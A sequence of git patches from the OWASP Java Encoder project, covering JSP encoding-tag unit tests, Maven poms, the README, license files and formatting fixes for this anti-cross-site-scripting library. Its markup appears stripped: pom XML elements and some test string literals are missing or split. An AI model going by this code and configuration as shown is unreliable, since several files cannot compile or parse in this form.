@author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriTagTest extends EncodingTagTest { + + public ForUriTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForUriTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForUriTag instance = new ForUriTag(); + String value = "\\\""; + String expected = "%5C%22"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java new file mode 100644 index 0000000..ec42f28 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForXmlAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlAttributeTagTest extends EncodingTagTest { + + public ForXmlAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForXmlAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForXmlAttributeTag instance = new ForXmlAttributeTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java new file mode 100644 index 0000000..cf5182a --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForXmlCommentTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlCommentTagTest extends EncodingTagTest { + + public ForXmlCommentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForXmlCommentTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForXmlCommentTag instance = new ForXmlCommentTag(); + String value = "--> + + + 4.0.0 + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + pom + + OWASP Encoders Parent + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + 2011 + + OWASP (Open Web-Application Security Project) + https://www.owasp.org/ + + + + + The BSD 3-Clause License + http://www.opensource.org/licenses/BSD-3-Clause + repo + + + + + org.sonatype.oss + oss-parent + 7 + + + + scm:svn:https://owasp-java-encoder.googlecode.com/svn/trunk/ + scm:svn:http://owasp-java-encoder.googlecode.com/svn/trunk/ + http://code.google.com/p/owasp-java-encoder/source/browse/ + + + + + Owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + owasp-java-encoder-project@lists.owasp.org + http://lists.owasp.org/pipermail/owasp-java-encoder-project/ + + + + + Google Code + http://code.google.com/p/owasp-java-encoder/issues/list + + + + + Jeff Ichnowski + + Project Owner + Architect + Developer + + + + Jim Manico + + Architect + Developer + + + + + + Jeremy Long + jeremy.long@gmail.com + + + + + UTF-8 + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.0 + + 1.5 + 1.5 + + + + + + + core + jsp + esapi + + + -- cgit v1.2.3 From 0855f008384c82aa9d531dbed31f902754a6fc61 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:42:06 -0400 Subject: initial version --- .gitignore | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..dbd3596 --- /dev/null +++ b/.gitignore @@ -0,0 +1,14 @@ +*/target/** +# Intellij project files +*.iml +*.ipr +*.iws +.idea/ +# Eclipse project files +.classpath +.project +.settings +maven-eclipse.xml +.externalToolBuilders +# Netbeans configuration +nb-configuration.xml \ No newline at end of file -- cgit v1.2.3 From 09fb227288cb94957698cd45ec4e34888b08c47a Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:42:34 -0400 Subject: initial version --- README.md | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..ae791cc --- /dev/null +++ b/README.md @@ -0,0 +1,53 @@ +OWASP Java Encoder Project +========================== +Contextual Output Encoding is a computer programming technique necessary to stop Cross Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage. + +For more information on how to use this project, please see https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project. + +Start using the OWASP Java Encoders +----------------------------------- +You can download a JAR from [Maven Central](http://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). + +JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.1.1/encoder-jsp-1.1.1.jar). This jar requires the core library. + +The jars are also available in Maven: + +'''xml + + org.owasp.encoder + encoder + 1.1.1 + + + + org.owasp.encoder + encoder-jsp + 1.1.1 + +``` + +Quick Overview +-------------- +The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.1.1.jar, import org.owasp.encoder.Encode and start using. + +Example usage: + +```java + PrintWriter out = ....; + out.println(""); +``` + +Please look at the javadoc for Encode to see the variety of contexts for which you can encode. + +Happy Encoding! + +News +---- +### 2014-03-31 - Documentation updated +Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use! + +### 2014-01-30 - Version 1.1.1 released +We're happy to announce that version 1.1.1 has been released. Along with a important bug fix, we added ESAPI integration to replace the legacy ESAPI encoders with the OWASP Java Encoder. + +### 2013-02-14 - Version 1.1 released +We're happy to announce that version 1.1 has been released. Along with a few minor encoding enhancements, we improved performance, and added a JSP tag and function library. \ No newline at end of file -- cgit v1.2.3 From 20ec48ce1bed54131dd000a71c0b6820e4f29f29 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:43:07 -0400 Subject: BSD 3.0 --- LICENSE | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..f66c375 --- /dev/null +++ b/LICENSE @@ -0,0 +1,33 @@ +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file -- cgit v1.2.3 From 8964a1902f02a1ca9a42456150cc37634ae494c8 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:44:39 -0400 Subject: minor correction --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ae791cc..af278c6 100644 --- a/README.md +++ b/README.md @@ -12,7 +12,7 @@ JSP tags and functions are available in the encoder-jsp, also avaiable in [Centr The jars are also available in Maven: -'''xml +```xml org.owasp.encoder encoder -- cgit v1.2.3 From 4d0667ebd1eda0ac6f9025a26bc5acdf2ce239b5 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:54:25 -0400 Subject: corrected license --- core/pom.xml | 59 ++++++++++++++++++++++++++------------- esapi/pom.xml | 90 ++++++++++++++++++++++++++++++++++++----------------------- jsp/pom.xml | 58 +++++++++++++++++++++++++------------- pom.xml | 60 ++++++++++++++++++++++++++------------- 4 files changed, 173 insertions(+), 94 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index 917768b..8ee4d3d 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 @@ -32,10 +52,10 @@ OWASP Encoders - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. @@ -204,7 +224,6 @@ - diff --git a/esapi/pom.xml b/esapi/pom.xml index 531afbb..dca2527 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 @@ -32,10 +52,10 @@ OWASP Encoders ESAPI Thunk - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. @@ -175,22 +195,22 @@ - - org.owasp.encoder - encoder - 1.2-SNAPSHOT - - - org.owasp.esapi - esapi - [2.0,3) - - - junit - junit - 3.8.1 - test - + + org.owasp.encoder + encoder + 1.2-SNAPSHOT + + + org.owasp.esapi + esapi + [2.0,3) + + + junit + junit + 3.8.1 + test + diff --git a/jsp/pom.xml b/jsp/pom.xml index 5d53304..4ba1bff 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 @@ -32,10 +52,10 @@ OWASP Encoders JSP tags and EL functions - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. diff --git a/pom.xml b/pom.xml index f712f20..dac62c7 100755 --- a/pom.xml +++ b/pom.xml @@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 org.owasp.encoder @@ -27,10 +47,10 @@ OWASP Encoders Parent - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. https://www.owasp.org/index.php/OWASP_Java_Encoder_Project @@ -120,7 +140,7 @@ core jsp - esapi + esapi -- cgit v1.2.3 From 874178b6bbf99c48a1a5cc06f8dbc52f71071936 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 07:03:15 -0400 Subject: BSD 3.0 --- COPYING | 66 ++++++++++++++++++++++++++++++++--------------------------------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/COPYING b/COPYING index 51d2e0e..f66c375 100644 --- a/COPYING +++ b/COPYING @@ -1,33 +1,33 @@ -// Copyright (c) 2012 Jeff Ichnowski -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without -// modification, are permitted provided that the following conditions -// are met: -// -// * Redistributions of source code must retain the above -// copyright notice, this list of conditions and the following -// disclaimer. -// -// * Redistributions in binary form must reproduce the above -// copyright notice, this list of conditions and the following -// disclaimer in the documentation and/or other materials -// provided with the distribution. -// -// * Neither the name of the OWASP nor the names of its -// contributors may be used to endorse or promote products -// derived from this software without specific prior written -// permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS -// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE -// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, -// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) -// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, -// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED -// OF THE POSSIBILITY OF SUCH DAMAGE. +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file -- cgit v1.2.3 From d1d390b594f4558ad00686df1bf61a7fa12ff785 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 07:08:02 -0400 Subject: moved this to the LICENSE file --- COPYING | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 COPYING diff --git a/COPYING b/COPYING deleted file mode 100644 index f66c375..0000000 --- a/COPYING +++ /dev/null @@ -1,33 +0,0 @@ -Copyright (c) 2015 Jeff Ichnowski -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions -are met: - - * Redistributions of source code must retain the above - copyright notice, this list of conditions and the following - disclaimer. - - * Redistributions in binary form must reproduce the above - copyright notice, this list of conditions and the following - disclaimer in the documentation and/or other materials - provided with the distribution. - - * Neither the name of the OWASP nor the names of its - contributors may be used to endorse or promote products - derived from this software without specific prior written - permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS -FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE -COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, -INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) -HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, -STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED -OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file -- cgit v1.2.3 From 29097dd5fcf52fb28b3ae9a37999a75c86026d88 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:02:48 -0400 Subject: checkstyle format correction --- core/src/main/java/org/owasp/encoder/Encode.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 1ba4984..46003e0 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -641,7 +641,7 @@ public final class Encode { * @param out where to write encoded output * @param input the input string to encode * @throws IOException if thrown by writer - * + * * @deprecated There is never a need to encode a complete URI with this form of encoding. */ @Deprecated public static void forUri(Writer out, String input) -- cgit v1.2.3 From a9468ee165fc1c3c23328c42fd08618a2e505417 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:04:59 -0400 Subject: moved to src/main/config/ --- checkstyle.xml | 202 ---------------------------------- src/main/config/checkstyle-header.txt | 35 ++++++ src/main/config/checkstyle.xml | 202 ++++++++++++++++++++++++++++++++++ 3 files changed, 237 insertions(+), 202 deletions(-) delete mode 100644 checkstyle.xml create mode 100644 src/main/config/checkstyle-header.txt create mode 100644 src/main/config/checkstyle.xml diff --git a/checkstyle.xml b/checkstyle.xml deleted file mode 100644 index 530c5a9..0000000 --- a/checkstyle.xml +++ /dev/null @@ -1,202 